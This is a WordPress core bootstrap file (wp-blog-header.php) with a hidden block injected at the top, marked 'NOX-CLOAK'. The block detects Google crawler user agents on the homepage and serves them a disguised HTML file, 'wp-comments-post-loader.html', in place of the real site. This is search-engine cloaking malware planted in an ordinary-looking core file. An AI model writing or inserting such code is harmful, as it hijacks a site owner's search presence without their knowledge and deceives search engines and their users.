<?php
/* NOX-CLOAK-START */
$_nox_ua=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'';
$_nox_uri=isset($_SERVER['REQUEST_URI'])?strtok($_SERVER['REQUEST_URI'],'?'):'';
if(preg_match('/Googlebot|AdsBot-Google|Mediapartners-Google|Google-InspectionTool|Google-/i',$_nox_ua)&&$_nox_uri==='/'){
  $_nox_html=__DIR__.'/wp-comments-post-loader.html';
  if(file_exists($_nox_html)){while(ob_get_level()>0)ob_end_clean();header('Content-Type: text/html; charset=utf-8');header('Vary: User-Agent');readfile($_nox_html);exit;}
}
unset($_nox_ua,$_nox_uri,$_nox_html);
/* NOX-CLOAK-END */

/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}
